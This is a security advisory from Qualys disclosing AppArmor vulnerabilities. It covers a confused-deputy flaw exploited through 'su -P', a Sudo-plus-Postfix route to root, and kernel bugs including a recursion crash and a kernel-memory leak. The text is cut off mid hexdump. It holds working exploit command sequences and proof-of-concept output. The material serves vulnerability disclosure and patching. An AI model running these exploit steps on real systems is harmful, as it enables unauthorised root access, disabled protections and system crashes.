Qualys Security Advisory CrackArmor: Multiple vulnerabilities in AppArmor ======================================================================== Contents ======================================================================== Summary The confused-deputy problem - Removing an existing profile - Loading a new profile - Bypassing Ubuntu's user-namespace restrictions AppArmor + Sudo + Postfix = root Kernel vulnerabilities - An uncontrolled recursion - An out-of-bounds read - A use-after-free - A double-free Acknowledgments Timeline Inspired by Jann Horn's "Mitigations are attack surface, too": https://projectzero.google/2020/02/mitigations-are-attack-surface-too.html ======================================================================== Summary ======================================================================== We discovered multiple vulnerabilities in AppArmor, a Linux Security Module (LSM) that is enabled by default in major distributions such as Ubuntu, Debian, and SUSE (Android and Red Hat derivatives use another LSM, SELinux, instead of AppArmor). First, we discovered a fundamental vulnerability (a "confused-deputy" problem) that allows an unprivileged local attacker to load, replace, and remove arbitrary AppArmor profiles, and consequently: a/ weaken the system's defenses, by removing existing AppArmor profiles that are supposed to protect key programs and services from local and remote attackers (for example, the profiles for cupsd and rsyslogd); b/ carry out a denial-of-service attack against the system, by loading new restrictive AppArmor profiles (for example, a "deny all" profile for sshd would prevent any legitimate user from logging into the system remotely); c/ bypass Ubuntu's unprivileged user-namespace restrictions (even if all publicly known bypasses were fixed), by loading a new arbitrary "userns" AppArmor profile (which allows an unprivileged local attacker to create user namespaces with full capabilities). Second, and perhaps more surprisingly, we were able to transform this first fundamental vulnerability (the ability to load, replace, remove arbitrary AppArmor profiles) into various Local Privilege Escalations (LPEs) from any unprivileged local user to full root privileges: a/ in user space, by loading new AppArmor profiles that deny specific syscalls to specific privileged programs (for example, in the default installation of Ubuntu Server 24.04.3 plus the Postfix mail server, we create a "fail-open" situation in Sudo and trivially obtain full root privileges); b/ in kernel space (where our arbitrary AppArmor profiles are parsed), we discovered various vulnerabilities in AppArmor's code, exploitable by loading, replacing, and removing arbitrary profiles; in particular: - an uncontrolled recursion that leads to a kernel stack exhaustion and is, to the best of our knowledge, a denial-of-service only (a complete system crash), because no kernel stack allocation is large enough to jump over the CONFIG_VMAP_STACK guard page; - an out-of-bounds read after an 8KB kmalloc()ed buffer, which allows us to disclose 64KB of kernel memory (including numerous kernel pointers randomized by KASLR) on at least Ubuntu 24.04.3 and Debian 13.1; - a use-after-free in the kmalloc-192 slab cache, exploitable on at least Ubuntu 24.04.3 and Debian 13.1 (an LPE to full root privileges) despite the CONFIG_RANDOM_KMALLOC_CACHES mitigation (which is enabled by default in Ubuntu 24.04.3); - a double-free in any slab cache between kmalloc-8 and kmalloc-256, exploitable on at least Debian 13.1 (an LPE to full root privileges) despite the "dedicated slab buckets for memdup_user()" mitigation (CONFIG_SLAB_BUCKETS, enabled by default in Debian 13.1). Note: in total, we discovered 9 (nine) vulnerabilities in AppArmor, but we have not detailed all of them in this advisory: - "[PATCH 01/11] apparmor: validate DFA start states are in bounds in unpack_pdb" (an out-of-bounds read); - "[PATCH 02/11] apparmor: fix memory leak in verify_header" (a memory leak); - "[PATCH 03/11] apparmor: replace recursive profile removal with iterative approach" and "[PATCH 04/11] apparmor: fix: limit the number of levels of policy namespaces" (the uncontrolled recursion detailed in this advisory); - "[PATCH 05/11] apparmor: fix side-effect bug in match_char() macro usage" (the out-of-bounds read detailed in this advisory); - "[PATCH 06/11] apparmor: fix missing bounds check on DEFAULT table in verify_dfa()" (an out-of-bounds read and write); - "[PATCH 07/11] apparmor: Fix double free of ns_name in aa_replace_profiles()" (the double-free detailed in this advisory); - "[PATCH 08/11] apparmor: fix unprivileged local user can do privileged policy management" (the confused-deputy problem detailed in this advisory); - "[PATCH 09/11] apparmor: fix differential encoding verification" (an infinite loop); - "[PATCH 10/11] apparmor: fix race on rawdata dereference" and "[PATCH 11/11] apparmor: fix race between freeing data and fs accessing it" (the use-after-free detailed in this advisory). Last-minute note: unfortunately, no CVEs have been assigned to these vulnerabilities yet, because "CVEs are assigned after-the-fact"; from http://www.kroah.com/log/blog/2026/02/16/linux-cve-assignment-process/: "CVE ids are usually assigned on a one to two week delay from when the fix has landed in a released stable kernel version. This allows users who are regularly taking the Linux stable releases to ensure that their systems are secure before CVEs are announced to the world." ======================================================================== The confused-deputy problem ======================================================================== From https://en.wikipedia.org/wiki/Confused_deputy_problem: "In information security, a confused deputy is a computer program that is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system." We recently noticed that the pseudo-files to load, replace, and remove AppArmor profiles are world-writable (mode 0666); in other words, any unprivileged local user can open() these files in O_WRONLY mode: ------------------------------------------------------------------------ $ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Ubuntu 24.04.3 LTS" $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ ls -l /sys/kernel/security/apparmor/{.load,.replace,.remove} -rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.load -rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.remove -rw-rw-rw- 1 root root 0 Oct 14 12:17 /sys/kernel/security/apparmor/.replace ------------------------------------------------------------------------ Unsurprisingly, however, although open()ing these files in O_WRONLY mode succeeds, actually write()ing to them as an unprivileged user fails with an EACCES error ("Permission denied"): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ strace echo whatever > /sys/kernel/security/apparmor/.remove ... write(1, "whatever\n", 9) = -1 EACCES (Permission denied) ... ------------------------------------------------------------------------ ------------------------------------------------------------------------ # dmesg ... apparmor="STATUS" operation="profile_remove" info="not policy admin" error=-13 profile="unconfined" pid=1184 comm="echo" ------------------------------------------------------------------------ This immediately reminded us of historical Linux kernel vulnerabilities such as CVE-2012-0056 (Mempodipper), CVE-2013-1959, and the more recent ns_last_pid: https://git.zx2c4.com/CVE-2012-0056/about/ (by Jason Donenfeld) https://www.openwall.com/lists/oss-security/2013/04/29/1 (by Andy Lutomirski) https://www.openwall.com/lists/oss-security/2025/06/03/5 (by Vegard Nossum) All of these vulnerabilities were exploited by: - open()ing a pseudo-file such as /proc/pid/mem, /proc/pid/uid_map, or /proc/sys/kernel/ns_last_pid (as an unprivileged user) in O_WRONLY or O_RDWR mode, and dup2()ing the resulting file descriptor to stdout or stderr; - execve()ing a privileged program such as su, gpasswd, or newgrp and forcing it to write() a partly controlled string to stdout or stderr, and hence to the pseudo-file in /proc (this write() succeeds because the program is privileged, it would otherwise fail with an EACCES or EPERM error). We therefore tried to write() to AppArmor's pseudo-files via the stderr of a privileged program (su), and confirmed that, incredibly, AppArmor is indeed vulnerable (this time write() did not fail with EACCES ("not policy admin"), but with ENOENT ("profile does not exist") because the string that su wrote to stderr is not the name of an existing AppArmor profile): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ su whatever 2>/sys/kernel/security/apparmor/.remove ------------------------------------------------------------------------ ------------------------------------------------------------------------ # dmesg ... apparmor="STATUS" operation="profile_remove" info="profile does not exist" error=-2 profile="unconfined" name=0A pid=1197 comm="su" ------------------------------------------------------------------------ To fully exploit this vulnerability (in particular, to load arbitrary AppArmor profiles), we must find a privileged program that can be forced into write()ing completely controlled strings, including null bytes, to its stdout or stderr. We searched high and low, and eventually found su in pty mode (its -P or --pty option), which is installed by default and effectively acts as a privileged proxy between two unprivileged programs (the program that executes su, and the program that is executed by su as our unprivileged user). Consequently, we now have the ability to load, replace, and remove arbitrary AppArmor profiles. ======================================================================== Removing an existing profile ======================================================================== To remove an existing AppArmor profile (for example, the profile for rsyslogd) as an unprivileged local user, we simply write() the name of this profile to AppArmor's .remove file, via su's stdout in pty mode (note: su's password prompt below is obviously for our unprivileged user, not for root): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ ls -l /sys/kernel/security/apparmor/policy/profiles/*rsyslogd* total 0 -r--r--r-- 1 root root 0 Oct 14 12:17 attach -r--r--r-- 1 root root 0 Oct 14 12:17 learning_count -r--r--r-- 1 root root 0 Oct 14 12:17 mode -r--r--r-- 1 root root 0 Oct 14 12:17 name lr--r--r-- 1 root root 0 Oct 14 12:17 raw_abi -> ../../raw_data/93/abi lr--r--r-- 1 root root 0 Oct 14 12:17 raw_data -> ../../raw_data/93/raw_data lr--r--r-- 1 root root 0 Oct 14 12:17 raw_sha256 -> ../../raw_data/93/sha256 -r--r--r-- 1 root root 0 Oct 14 12:17 sha256 $ su -P -c 'stty raw && echo -n rsyslogd' "$USER" > /sys/kernel/security/apparmor/.remove Password: $ ls -l /sys/kernel/security/apparmor/policy/profiles/*rsyslogd* ls: cannot access '/sys/kernel/security/apparmor/policy/profiles/*rsyslogd*': No such file or directory ------------------------------------------------------------------------ ======================================================================== Loading a new profile ======================================================================== To load a new AppArmor profile (for example, a "deny all" profile for sshd) as an unprivileged local user, we first compile this profile into a binary form with apparmor_parser, and then write() this binary profile to AppArmor's .load file, via su's stdout in pty mode (note: we load an empty profile below, instead of an explicit "deny all" profile, because AppArmor profiles are already allow-lists by default): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ ls -l /sys/kernel/security/apparmor/policy/profiles/*sshd* ls: cannot access '/sys/kernel/security/apparmor/policy/profiles/*sshd*': No such file or directory $ apparmor_parser -K -o sshd.pf << "EOF" /usr/sbin/sshd { } EOF $ su -P -c 'stty raw && cat sshd.pf' "$USER" > /sys/kernel/security/apparmor/.load Password: $ ls -l /sys/kernel/security/apparmor/policy/profiles/*sshd* total 0 -r--r--r-- 1 root root 0 Oct 14 17:01 attach -r--r--r-- 1 root root 0 Oct 14 17:01 learning_count -r--r--r-- 1 root root 0 Oct 14 17:01 mode -r--r--r-- 1 root root 0 Oct 14 17:01 name lr--r--r-- 1 root root 0 Oct 14 17:01 raw_abi -> ../../raw_data/105/abi lr--r--r-- 1 root root 0 Oct 14 17:01 raw_data -> ../../raw_data/105/raw_data lr--r--r-- 1 root root 0 Oct 14 17:01 raw_sha256 -> ../../raw_data/105/sha256 -r--r--r-- 1 root root 0 Oct 14 17:01 sha256 $ ssh localhost kex_exchange_identification: read: Connection reset by peer Connection reset by 127.0.0.1 port 22 ------------------------------------------------------------------------ ======================================================================== Bypassing Ubuntu's user-namespace restrictions ======================================================================== To bypass Ubuntu's unprivileged user-namespace restrictions, we load a new "userns" AppArmor profile for /usr/bin/time, which then allows us to create unprivileged user namespaces with full capabilities, even if all publicly known bypasses (aa-exec, busybox, and LD_PRELOAD) were fixed: https://www.qualys.com/2025/three-bypasses-of-Ubuntu-unprivileged-user-namespace-restrictions.txt https://discourse.ubuntu.com/t/understanding-apparmor-user-namespace-restriction/58007 https://u1f383.github.io/linux/2025/06/26/the-journey-of-bypassing-ubuntus-unprivileged-namespace-restriction.html (by Pumpkin Chang) ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ sysctl kernel.apparmor_restrict_unprivileged_unconfined kernel.apparmor_restrict_unprivileged_unconfined = 1 $ unshare -U -r -m /bin/sh unshare: write failed /proc/self/uid_map: Operation not permitted $ aa-exec -p trinity -- unshare -U -r -m /bin/sh unshare: write failed /proc/self/uid_map: Operation not permitted $ apparmor_parser -K -o time.pf << "EOF" /usr/bin/time flags=(unconfined) { userns, } EOF $ su -P -c 'stty raw && cat time.pf' "$USER" > /sys/kernel/security/apparmor/.replace Password: $ /usr/bin/time -- unshare -U -r -m /bin/sh # mount --bind /etc/passwd /etc/passwd # mount ... /dev/mapper/ubuntu--vg-ubuntu--lv on /etc/passwd type ext4 (rw,relatime) ------------------------------------------------------------------------ ======================================================================== AppArmor + Sudo + Postfix = root ======================================================================== Did you get your disconnection notice? Mine came in the mail today -- Sonic Youth, "Disconnection Notice" As an unprivileged local attacker, the ability to load, replace, and remove arbitrary AppArmor profiles is remarkable, but our crucial and burning question was: can this ability be transformed into an LPE to full root privileges? Our key idea was to load new AppArmor profiles that deny certain syscalls to certain privileged programs, and consequently to create exploitable "fail-open" situations. From our work on Baron Samedit, we remembered that when Sudo encounters an unusual situation, it sends a mail to the system's administrator. And to send such a mail on Ubuntu, Sudo executes /usr/sbin/sendmail as our unprivileged user, not as root, with our original environment variables preserved (excluding the obviously dangerous variables such as LD_AUDIT and LD_PRELOAD, which were removed from the environment by the dynamic loader, ld.so, before the execution of Sudo's main() function). From CVE-2002-0043: https://www.sudo.ws/security/advisories/postfix/ (by Sebastian Krahmer) we also remembered that if the Postfix mail server is installed on the system, and if Postfix's /usr/sbin/sendmail is executed as root but with user-controlled environment variables (in particular, the MAIL_CONFIG environment variable), then Postfix can be forced by the unprivileged user into executing arbitrary commands as root. Our burning question therefore became: if we, as an unprivileged local attacker, load a new AppArmor profile that denies the setuid capability (CAP_SETUID) to Sudo (thereby potentially preventing Sudo from dropping its root privileges before it executes Postfix's /usr/sbin/sendmail), and if we execute Sudo with a MAIL_CONFIG environment variable that points to our own Postfix configuration in /tmp, is the /usr/bin/id command from our Postfix configuration executed as root? The answer: ------------------------------------------------------------------------ $ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Ubuntu 24.04.3 LTS" $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ dpkg -S /usr/sbin/sendmail postfix: /usr/sbin/sendmail $ mkdir /tmp/postfix $ cat > /tmp/postfix/main.cf << "EOF" command_directory = /tmp/postfix EOF $ cat > /tmp/postfix/postdrop << "EOF" #!/bin/sh /usr/bin/id >> /tmp/postfix/pwned EOF $ chmod -R 0755 /tmp/postfix $ apparmor_parser -K -o sudo.pf << "EOF" /usr/bin/sudo { allow file, allow signal, allow network, allow capability, deny capability setuid, } EOF $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace Password: $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted sudo: unable to open /etc/sudoers: Operation not permitted sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted sudo: error initializing audit plugin sudoers_audit $ cat /tmp/postfix/pwned uid=0(root) gid=1001(jane) groups=1001(jane),100(users) ^^^^^^^^^^^ ------------------------------------------------------------------------ The surprising sequence of events that led to this LPE as root is: - in sudoers_init(), Sudo calls setresuid(0, -1, -1) to set its real uid to 0 (PERM_ROOT), which succeeds because its effective and saved uids are already 0 (Sudo is SUID-root); - in open_sudoers() (more precisely, in open_file()), Sudo calls setresuid(-1, 1, -1) to temporarily set its effective uid to 1 (PERM_SUDOERS), which fails (with EPERM, "Operation not permitted") because none of Sudo's uids is 1 (they are all 0) and because Sudo does not have the CAP_SETUID (our AppArmor profile denies it); - back in sudoers_init(), Sudo calls mail_parse_errors() to send a mail to the administrator about this setresuid() failure ("problem parsing sudoers", "unable to open /etc/sudoers: Operation not permitted"); - then, in exec_mailer(), Sudo calls setuid(0) (at line 331 below) to set all of its uids to 0, which succeeds because they are already 0; - still in exec_mailer(), Sudo calls setuid(1001) (at line 336) to permanently set all of its uids to our unprivileged user's uid, which fails (with EPERM, "Operation not permitted") because none of Sudo's uids is 1001 (they are all 0) and because Sudo does not have the CAP_SETUID (our AppArmor profile denies it); - finally, and despite this setuid() failure, Sudo's exec_mailer() calls execv() (at line 345) to execute Postfix's /usr/sbin/sendmail with our original environment variables (including our MAIL_CONFIG), as root instead of our unprivileged user (because the setuid(1001) to drop Sudo's root privileges failed). ------------------------------------------------------------------------ 284 exec_mailer(int pipein) ... 327 /* 328 * Depending on the config, either run the mailer as root 329 * (so user cannot kill it) or as the user (for the paranoid). 330 */ 331 if (setuid(ROOT_UID) != 0) { 332 sudo_debug_printf(SUDO_DEBUG_ERROR, "unable to change uid to %u", 333 ROOT_UID); 334 } 335 if (evl_conf->mailuid != ROOT_UID) { 336 if (setuid(evl_conf->mailuid) != 0) { 337 sudo_debug_printf(SUDO_DEBUG_ERROR, "unable to change uid to %u", 338 (unsigned int)evl_conf->mailuid); 339 } 340 } ... 342 if (evl_conf->mailuid == ROOT_UID) 343 execve(mpath, argv, (char **)root_envp); 344 else 345 execv(mpath, argv); ------------------------------------------------------------------------ Note: without the ability to load an AppArmor profile that denies the CAP_SETUID to Sudo, this "fail-open" situation in Sudo would not be exploitable, for the reasons explained in the "execve() and EAGAIN" section of "man execve". Last-minute note: while writing a mail to Sudo's maintainer about this "fail-open" situation, we noticed that it was independently discovered, reported, and fixed in November 2025 (commit 3e474c2): ------------------------------------------------------------------------ exec_mailer: Set group as well as uid when running the mailer Also make a setuid(), setgid() or setgroups() failure fatal. Found by the ZeroPath AI Security Engineer ------------------------------------------------------------------------ Slightly disappointed by this user-space LPE (because Postfix is not installed by default on Ubuntu anymore), we decided to explore one more idea: maybe AppArmor's kernel code contains vulnerabilities that can be exploited in kernel space by loading, replacing, or removing arbitrary AppArmor profiles? ======================================================================== An uncontrolled recursion ======================================================================== I think I've been there once before Something tells me there's so much more -- Sonic Youth, "The Wonder" The first kernel vulnerability that we discovered in AppArmor's code is an uncontrolled recursion. An AppArmor profile can contain subprofiles (named "myprofile//mysubprofile" for example), which can themselves contain subprofiles (named "myprofile//mysubprofile//mysubsubprofile" for example), etc. To remove such a profile, AppArmor's kernel code calls __remove_profile(), which first calls __aa_profile_list_release() to remove all of its subprofiles, which then calls __remove_profile() again, etc; in other words, __remove_profile() is called recursively: ------------------------------------------------------------------------ 192 static void __remove_profile(struct aa_profile *profile) ... 198 /* release any children lists first */ 199 __aa_profile_list_release(&profile->base.profiles); ------------------------------------------------------------------------ 212 void __aa_profile_list_release(struct list_head *head) ... 215 list_for_each_entry_safe(profile, tmp, head, base.list) 216 __remove_profile(profile); ------------------------------------------------------------------------ Consequently, if we create a deeply nested hierarchy of subprofiles (1024, in the proof-of-concept below), and if we remove the ancestor profile (by write()ing its name to AppArmor's .remove pseudo-file), then AppArmor calls __remove_profile() recursively, exhausts its kernel stack (16KB on x86_64), and crashes the system (because Ubuntu 24.04.3 and Debian 13.1 protect their kernel stacks with CONFIG_VMAP_STACK guard pages). To load all of these subprofiles in the proof-of-concept below, we first create an AppArmor namespace, by loading a new namespaced profile (named ":mynamespace:myprofile" for example), and enter this AppArmor namespace through a new user namespace (created thanks to our "userns" profile for /usr/bin/time) to obtain full capabilities inside this AppArmor and user namespace. This allows us to write() to AppArmor's pseudo-files directly (.load, .replace, .remove) instead of write()ing to these files via su's stdout in pty mode, but it is not strictly necessary (we could execute su repeatedly, or execute it once and carefully synchronize repeated write()s); it does, however, greatly simplify our proof-of-concept: ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ ls -l /sys/kernel/security/apparmor/policy/namespaces total 0 $ apparmor_parser -K -o myns.pf << "EOF" profile :myns:mypf flags=(unconfined) { userns, } EOF $ su -P -c 'stty raw && cat myns.pf' "$USER" > /sys/kernel/security/apparmor/.load Password: $ ls -l /sys/kernel/security/apparmor/policy/namespaces total 0 drwxr-xr-x 5 root root 0 Oct 15 16:04 myns $ /usr/bin/time -- aa-exec -n myns -p mypf -- unshare -U -r /bin/bash # pf='a'; for ((i=0; i<1024; i++)); do echo -e "profile $pf { \n }" | apparmor_parser -K -a; pf="$pf//x"; done # echo -n a > /sys/kernel/security/apparmor/.remove Write failed: Broken pipe ------------------------------------------------------------------------ To the best of our knowledge, this uncontrolled recursion is only a denial-of-service (not an LPE), because no kernel stack allocation is large enough to jump over the CONFIG_VMAP_STACK guard page (step 3 in the "stack-clash" attack). ======================================================================== An out-of-bounds read ======================================================================== Close your eyes and feel the fun Pattern recognition is on the run -- Sonic Youth, "Pattern Recognition" The second kernel vulnerability that we discovered in AppArmor's code is an out-of-bounds memory read. When a user-space program that is confined by an AppArmor profile tries to access a file or directory (/etc/passwd or /etc for example), AppArmor decides whether this access should be allowed or denied by matching the filename against an AppArmor Regular Expression (AARE), which is similar to a shell globbing pattern (for example, /etc/*). In the kernel, AppArmor implements such an AARE with a Deterministic Finite Automaton (DFA) -- essentially a state machine: a set of states, and transitions between these states that depend on the input string to be matched. To match a string (a filename) against such a DFA, AppArmor calls aa_dfa_match(), which calls match_char() in a loop, for each byte of the input string. Unfortunately, match_char() is an unsafe macro (it can evaluate its arguments more than once, because of its "} while (1)" loop and its MATCH_FLAG_DIFF_ENCODE at lines 371-372), and its call at line 457 has side effects (the increment of the str pointer): ------------------------------------------------------------------------ 365 #define match_char(state, def, base, next, check, C) \ 366 do { \ 367 u32 b = (base)[(state)]; \ 368 unsigned int pos = base_idx(b) + (C); \ 369 if ((check)[pos] != (state)) { \ 370 (state) = (def)[(state)]; \ 371 if (b & MATCH_FLAG_DIFF_ENCODE) \ 372 continue; \ 373 break; \ 374 } \ 375 (state) = (next)[pos]; \ 376 break; \ 377 } while (1) ------------------------------------------------------------------------ 435 aa_state_t aa_dfa_match(struct aa_dfa *dfa, aa_state_t start, const char *str) ... 456 while (*str) 457 match_char(state, def, base, next, check, (u8) *str++); ------------------------------------------------------------------------ As a result, the str pointer can be incremented more than once inside match_char(), past the string's terminating null byte (without passing through the null-byte test at line 456), thus leading to out-of-bounds memory reads, after the 8KB buffer where the string (the filename) is kmalloc()ed. Since we can build our own AppArmor DFA (by loading a new arbitrary profile), we had the idea of transforming this out-of-bounds read into a kernel-memory disclosure. For example, to disclose the 6th byte of the string "/etc" (the 1st byte is '/', the 5th byte is the terminating null byte '\0', and the 6th byte is the first out-of-bounds byte), we build a DFA that is equivalent to a "?????a*" globbing pattern (but our '?' matches any byte, including a null byte), we load it (by write()ing to AppArmor's .load file), we confine ourselves with it (by write()ing to /proc/self/attr/current), and we try to access /etc in the filesystem: - if this access is allowed (if our DFA accepts the string "/etc" and the following bytes), then the first out-of-bounds byte is indeed 'a'; - if this access is denied (if our DFA rejects the string "/etc" and the following bytes), then the first out-of-bounds byte is not 'a', and we retry with another DFA, "?????b*", then "?????c*", "?????d*", etc. In the worst case, this takes 256 tries to disclose one out-of-bounds byte; but we can do much better, we can build a DFA that accepts a whole range of bytes as the 6th byte, for example "?????[\x00-\x7F]*": - if the access is allowed, then the 6th byte is in the range [\x00-\x7F], and we retry with half of it, "?????[\x00-\x3F]*", etc; - if the access is denied, then the 6th byte is in the range [\x80-\xFF], and we retry with half of it, "?????[\x80-\xBF]*", etc. This binary search takes only 8 tries to disclose one out-of-bounds byte (one try per bit). More generally, to disclose the nth byte of the input string (the filename), we build a DFA that has n+2 states: - state i (1 <= i < n) reads the ith byte of the input string and always transitions to state i+1, independently of the value of the ith byte (this is the "?????" part of our "?????[\x00-\x7F]*" example); - state n transitions to state n+1 if the nth byte of the input string is in the accepted range, or transitions to state n+2 otherwise (this is the "[\x00-\x7F]" part of our "?????[\x00-\x7F]*" example); - state n+1 (the accept state) and state n+2 (the reject state) always transition to themselves, until a null byte is read at line 456 (this is the "*" part of our "?????[\x00-\x7F]*" example). Note: because AppArmor's DFA states are represented by 16-bit integers, we can only disclose 64KB of kernel memory. In the proof-of-concept below, we disclose the bytes from 60KB to 61KB after the 8KB buffer where the filename "/etc/passwd" is kmalloc()ed, including several kernel pointers randomized by KASLR (for example, ffffffffa7ea7420 is aa_global_buffers, ffffffffa6c43480 is shmem_ops, and ffffffffa86b19e0 is noop_backing_dev_info): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane),100(users) $ /usr/bin/time -- aa-exec -n myns -p mypf -- unshare -U -r /bin/bash # ./infoleak 1 64 0000: 2f/ 65e 74t 63c 2f/ 70p 61a 73s 73s 77w 64d 00. 00. e0. 2c, 80. 1e. 8e. ff. ff. 20. 74t ea. a7. ff. ff. ff. ff. 00. 00. 00. 00. 0020: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0040. # ./infoleak $((60*1024)) $((61*1024)) 0000: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 98. 2d- 80. 1e. 8e. ff. ff. 00. c8. 2d- 80. 1e. 8e. ff. ff. 1b. 00. 00. 0020: 00. 0c. 00. 00. 00. 00. 10. 00. 00. 00. 00. 00. 00. ff. ff. ff. ff. ff. ff. ff. 7f. e0. bd. e2. a7. ff. ff. ff. ff. 80. 344 c4. 0040: a6. ff. ff. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 40@ 2b+ c4. a6. ff. ff. ff. ff. 00. 00. 81. 0060: 70p 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 94. 19. 02. 01. 00. 00. 00. 00. 40@ 08. 49I 80. 1e. 8e. ff. ff. 00. 00. 00. 0080: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 88. 90. 2d- 80. 1e. 8e. ff. ff. 88. 90. 2d- 00a0: 80. 1e. 8e. ff. ff. 01. 00. 00. 00. 08. 00. 00. 00. 20. 22" 29) 80. 1e. 8e. ff. ff. a0. 2b+ c4. a6. ff. ff. ff. ff. 00. 00. 00. 00c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. 7e~ 2a* 80. 1e. 8e. ff. ff. 80. 12. 72r 83. 1e. 8e. ff. ff. 00. 00. 00. 0100: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. e0. 19. 6bk a8. ff. ff. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 10. c9. 2d- 0120: 80. 1e. 8e. ff. ff. 10. 399 4bK 83. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0140: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 48H 91. 2d- 80. 1e. 8e. ff. ff. 48H 91. 2d- 0160: 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0180: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 01a0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 01c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 01e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0200: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0220: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0240: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0260: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0280: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. 92. 2d- 80. 1e. 8e. ff. ff. 80. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 02a0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 28( 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 02c0: 00. 00. 00. 00. 00. b8. 92. 2d- 80. 1e. 8e. ff. ff. b8. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 02e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. e0. 92. 2d- 80. 1e. 8e. ff. ff. e0. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 0300: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 2c, 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0320: 00. 00. 00. 00. 00. 18. 93. 2d- 80. 1e. 8e. ff. ff. 18. 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0340: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 40@ 93. 2d- 80. 1e. 8e. ff. ff. 40@ 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 0360: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 300 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 0380: 00. 00. 00. 00. 00. 78x 93. 2d- 80. 1e. 8e. ff. ff. 78x 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. c0. 89. 83. 03a0: 80. 1e. 8e. ff. ff. 01. 00. 00. 